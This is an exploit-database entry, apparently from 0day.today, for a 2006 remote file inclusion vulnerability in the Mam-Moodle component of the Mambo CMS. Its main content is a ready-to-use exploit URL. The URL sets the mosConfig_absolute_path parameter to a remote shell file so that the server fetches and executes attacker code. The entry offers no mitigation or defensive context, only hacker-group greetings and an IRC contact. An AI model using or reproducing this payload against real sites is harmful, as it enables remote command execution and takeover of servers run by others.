Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability

2006-07-23T00:00:00
ID 1337DAY-ID-604
Type zdt
Reporter jank0
Modified 2006-07-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability
===============================================================



####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd


#  0day.today [2018-03-28]  #